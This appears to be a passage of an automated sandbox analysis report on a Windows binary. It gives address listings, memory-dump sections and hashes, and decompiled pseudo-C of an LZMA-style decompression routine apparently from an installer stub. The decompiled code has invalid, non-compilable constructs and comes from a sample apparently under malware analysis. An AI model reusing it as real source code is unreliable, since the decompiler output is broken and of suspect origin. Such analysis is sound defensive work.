                                                                                                                    0x00406304
                                                                                                                    0x00406308
                                                                                                                    0x0040630a
                                                                                                                    0x0040630e
                                                                                                                    0x004062da
                                                                                                                    0x004062da
                                                                                                                    0x004062de
                                                                                                                    0x004062e6
                                                                                                                    0x004062eb
                                                                                                                    0x004062ed
                                                                                                                    0x004062ef
                                                                                                                    0x004062ef
                                                                                                                    0x00406311
                                                                                                                    0x00406318
                                                                                                                    0x0040631b
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406326
                                                                                                                    0x00406326
                                                                                                                    0x0040632a
                                                                                                                    0x004069ea
                                                                                                                    0x004069ea
                                                                                                                    0x00000000
                                                                                                                    0x004069ea
                                                                                                                    0x00406330
                                                                                                                    0x00406330
                                                                                                                    0x00406333
                                                                                                                    0x00406336
                                                                                                                    0x0040633a
                                                                                                                    0x0040633d
                                                                                                                    0x00406343
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406348
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x00406351
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406353
                                                                                                                    0x00406353
                                                                                                                    0x00406356
                                                                                                                    0x00406359
                                                                                                                    0x0040635c
                                                                                                                    0x0040635f
                                                                                                                    0x00406362
                                                                                                                    0x00406365
                                                                                                                    0x00406368
                                                                                                                    0x0040636b
                                                                                                                    0x0040636e
                                                                                                                    0x00406371
                                                                                                                    0x00406389
                                                                                                                    0x0040638c
                                                                                                                    0x0040638f
                                                                                                                    0x00406392
                                                                                                                    0x00406392
                                                                                                                    0x00406395
                                                                                                                    0x00406399
                                                                                                                    0x0040639b
                                                                                                                    0x00406373
                                                                                                                    0x00406373
                                                                                                                    0x0040637b
                                                                                                                    0x00406380
                                                                                                                    0x00406382
                                                                                                                    0x00406384
                                                                                                                    0x00406384
                                                                                                                    0x0040639e
                                                                                                                    0x004063a5
                                                                                                                    0x004063a8
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x004063aa
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x004063a8
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063ea
                                                                                                                    0x004063ea
                                                                                                                    0x004063ee
                                                                                                                    0x004069f6
                                                                                                                    0x004069f6
                                                                                                                    0x00000000
                                                                                                                    0x004069f6
                                                                                                                    0x004063f4
                                                                                                                    0x004063f4
                                                                                                                    0x004063f7
                                                                                                                    0x004063fa
                                                                                                                    0x004063fe
                                                                                                                    0x00406401
                                                                                                                    0x00406407
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x0040640c
                                                                                                                    0x0040640f
                                                                                                                    0x0040640f
                                                                                                                    0x00406415
                                                                                                                    0x004063b3
                                                                                                                    0x004063b3
                                                                                                                    0x004063b6
                                                                                                                    0x00000000
                                                                                                                    0x004063b6
                                                                                                                    0x00406417
                                                                                                                    0x00406417
                                                                                                                    0x0040641a
                                                                                                                    0x0040641d
                                                                                                                    0x00406420
                                                                                                                    0x00406423
                                                                                                                    0x00406426
                                                                                                                    0x00406429
                                                                                                                    0x0040642c
                                                                                                                    0x0040642f
                                                                                                                    0x00406432
                                                                                                                    0x00406435
                                                                                                                    0x0040644d
                                                                                                                    0x00406450
                                                                                                                    0x00406453
                                                                                                                    0x00406456
                                                                                                                    0x00406456
                                                                                                                    0x00406459
                                                                                                                    0x0040645d
                                                                                                                    0x0040645f
                                                                                                                    0x00406437
                                                                                                                    0x00406437
                                                                                                                    0x0040643f
                                                                                                                    0x00406444
                                                                                                                    0x00406446
                                                                                                                    0x00406448
                                                                                                                    0x00406448
                                                                                                                    0x00406462
                                                                                                                    0x00406469
                                                                                                                    0x0040646c
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x004066fb
                                                                                                                    0x004066fb
                                                                                                                    0x004066ff
                                                                                                                    0x00406a26
                                                                                                                    0x00406a26
                                                                                                                    0x00000000
                                                                                                                    0x00406a26
                                                                                                                    0x00406705
                                                                                                                    0x00406705
                                                                                                                    0x00406708
                                                                                                                    0x0040670b
                                                                                                                    0x0040670f
                                                                                                                    0x00406712
                                                                                                                    0x00406718
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064cb
                                                                                                                    0x004064cb
                                                                                                                    0x004064ce
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040680a
                                                                                                                    0x0040680a
                                                                                                                    0x0040680e
                                                                                                                    0x00406830
                                                                                                                    0x00406830
                                                                                                                    0x00406833
                                                                                                                    0x0040683d
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00406810
                                                                                                                    0x00406810
                                                                                                                    0x00406813
                                                                                                                    0x00406817
                                                                                                                    0x0040681a
                                                                                                                    0x0040681a
                                                                                                                    0x0040681d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004068c7
                                                                                                                    0x004068c7
                                                                                                                    0x004068cb
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068f0
                                                                                                                    0x004068f7
                                                                                                                    0x004068fe
                                                                                                                    0x004068fe
                                                                                                                    0x00406905
                                                                                                                    0x00406908
                                                                                                                    0x0040690f
                                                                                                                    0x00000000
                                                                                                                    0x00406912
                                                                                                                    0x004068cd
                                                                                                                    0x004068cd
                                                                                                                    0x004068d0
                                                                                                                    0x004068d3
                                                                                                                    0x004068d6
                                                                                                                    0x004068dd
                                                                                                                    0x00406821
                                                                                                                    0x00406821
                                                                                                                    0x00406824
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004069b8
                                                                                                                    0x004069b8
                                                                                                                    0x004069bb
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x004068c2
                                                                                                                    0x00000000
                                                                                                                    0x004065f2
                                                                                                                    0x004065f2
                                                                                                                    0x004065f4
                                                                                                                    0x004065fb
                                                                                                                    0x004065fc
                                                                                                                    0x004065fe
                                                                                                                    0x00406601
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406905
                                                                                                                    0x00406905
                                                                                                                    0x00406908
                                                                                                                    0x0040690f
                                                                                                                    0x00000000
                                                                                                                    0x00406912
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406637
                                                                                                                    0x00406637
                                                                                                                    0x0040663a
                                                                                                                    0x00406670
                                                                                                                    0x00406670
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a3
                                                                                                                    0x004067a3
                                                                                                                    0x004067a6
                                                                                                                    0x004067a8
                                                                                                                    0x00406a32
                                                                                                                    0x00406a32
                                                                                                                    0x00000000
                                                                                                                    0x00406a32
                                                                                                                    0x004067ae
                                                                                                                    0x004067ae
                                                                                                                    0x004067b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067b7
                                                                                                                    0x004067b7
                                                                                                                    0x004067bb
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x00000000
                                                                                                                    0x004067be
                                                                                                                    0x0040663c
                                                                                                                    0x0040663c
                                                                                                                    0x0040663e
                                                                                                                    0x00406640
                                                                                                                    0x00406642
                                                                                                                    0x00406645
                                                                                                                    0x00406646
                                                                                                                    0x00406648
                                                                                                                    0x0040664a
                                                                                                                    0x0040664d
                                                                                                                    0x00406650
                                                                                                                    0x00406666
                                                                                                                    0x00406666
                                                                                                                    0x0040666b
                                                                                                                    0x004066a3
                                                                                                                    0x004066a3
                                                                                                                    0x004066a7
                                                                                                                    0x004066d0
                                                                                                                    0x004066d3
                                                                                                                    0x004066d5
                                                                                                                    0x004066dc
                                                                                                                    0x004066df
                                                                                                                    0x004066e2
                                                                                                                    0x004066e2
                                                                                                                    0x004066e7
                                                                                                                    0x004066e7
                                                                                                                    0x004066e9
                                                                                                                    0x004066ec
                                                                                                                    0x004066f3
                                                                                                                    0x004066f6
                                                                                                                    0x00406723
                                                                                                                    0x00406723
                                                                                                                    0x00406726
                                                                                                                    0x00406729
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x00000000
                                                                                                                    0x0040679d
                                                                                                                    0x0040672b
                                                                                                                    0x0040672b
                                                                                                                    0x00406731
                                                                                                                    0x00406734
                                                                                                                    0x00406737
                                                                                                                    0x0040673a
                                                                                                                    0x0040673d
                                                                                                                    0x00406740
                                                                                                                    0x00406743
                                                                                                                    0x00406746
                                                                                                                    0x00406749
                                                                                                                    0x0040674c
                                                                                                                    0x00406765
                                                                                                                    0x00406767
                                                                                                                    0x0040676a
                                                                                                                    0x0040676b
                                                                                                                    0x0040676e
                                                                                                                    0x00406770
                                                                                                                    0x00406773
                                                                                                                    0x00406775
                                                                                                                    0x00406777
                                                                                                                    0x0040677a
                                                                                                                    0x0040677c
                                                                                                                    0x0040677f
                                                                                                                    0x00406783
                                                                                                                    0x00406785
                                                                                                                    0x00406785
                                                                                                                    0x00406786
                                                                                                                    0x00406789
                                                                                                                    0x0040678c
                                                                                                                    0x0040674e
                                                                                                                    0x0040674e
                                                                                                                    0x00406756
                                                                                                                    0x0040675b
                                                                                                                    0x0040675d
                                                                                                                    0x00406760
                                                                                                                    0x00406760
                                                                                                                    0x0040678f
                                                                                                                    0x00406796
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00406798
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00406796
                                                                                                                    0x004066a9
                                                                                                                    0x004066a9
                                                                                                                    0x004066ac
                                                                                                                    0x004066ae
                                                                                                                    0x004066b1
                                                                                                                    0x004066b4
                                                                                                                    0x004066b7
                                                                                                                    0x004066b9
                                                                                                                    0x004066bc
                                                                                                                    0x004066bf
                                                                                                                    0x004066bf
                                                                                                                    0x004066c2
                                                                                                                    0x004066c2
                                                                                                                    0x004066c5
                                                                                                                    0x004066cc
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x004066ce
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x004066cc
                                                                                                                    0x00406652
                                                                                                                    0x00406652
                                                                                                                    0x00406655
                                                                                                                    0x00406657
                                                                                                                    0x0040665a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063b9
                                                                                                                    0x004063b9
                                                                                                                    0x004063bd
                                                                                                                    0x00406a02
                                                                                                                    0x00406a02
                                                                                                                    0x00000000
                                                                                                                    0x00406a02
                                                                                                                    0x004063c3
                                                                                                                    0x004063c3
                                                                                                                    0x004063c6
                                                                                                                    0x004063c9
                                                                                                                    0x004063cc
                                                                                                                    0x004063cf
                                                                                                                    0x004063d2
                                                                                                                    0x004063d5
                                                                                                                    0x004063d7
                                                                                                                    0x004063da
                                                                                                                    0x004063dd
                                                                                                                    0x004063e0
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406544
                                                                                                                    0x00406544
                                                                                                                    0x00406548
                                                                                                                    0x00406a0e
                                                                                                                    0x00406a0e
                                                                                                                    0x00000000
                                                                                                                    0x00406a0e
                                                                                                                    0x0040654e
                                                                                                                    0x0040654e
                                                                                                                    0x00406551
                                                                                                                    0x00406554
                                                                                                                    0x00406557
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x0040655c
                                                                                                                    0x0040655f
                                                                                                                    0x00406562
                                                                                                                    0x00406565
                                                                                                                    0x00406568
                                                                                                                    0x0040656b
                                                                                                                    0x0040656c
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x00406571
                                                                                                                    0x00406574
                                                                                                                    0x00406577
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657d
                                                                                                                    0x0040657f
                                                                                                                    0x0040657f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067cb
                                                                                                                    0x004067cb
                                                                                                                    0x004067ce
                                                                                                                    0x004067d1
                                                                                                                    0x004067d4
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d9
                                                                                                                    0x004067dc
                                                                                                                    0x004067df
                                                                                                                    0x004067e2
                                                                                                                    0x004067e5
                                                                                                                    0x004067e8
                                                                                                                    0x004067e9
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067ee
                                                                                                                    0x004067f1
                                                                                                                    0x004067f4
                                                                                                                    0x004067f7
                                                                                                                    0x004067fa
                                                                                                                    0x004067fe
                                                                                                                    0x00406800
                                                                                                                    0x00406803
                                                                                                                    0x00000000
                                                                                                                    0x00406805
                                                                                                                    0x00406805
                                                                                                                    0x00406582
                                                                                                                    0x00406582
                                                                                                                    0x00000000
                                                                                                                    0x00406582
                                                                                                                    0x00406803
                                                                                                                    0x00406a38
                                                                                                                    0x00406a38
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00406a6f
                                                                                                                    0x00406a6f
                                                                                                                    0x00000000
                                                                                                                    0x00406a6f
                                                                                                                    0x004068bc
                                                                                                                    0x0040693c
                                                                                                                    0x00406905

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                                                                                    • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                                                                                                    • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                                                                                    • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040680A, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E0040680A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
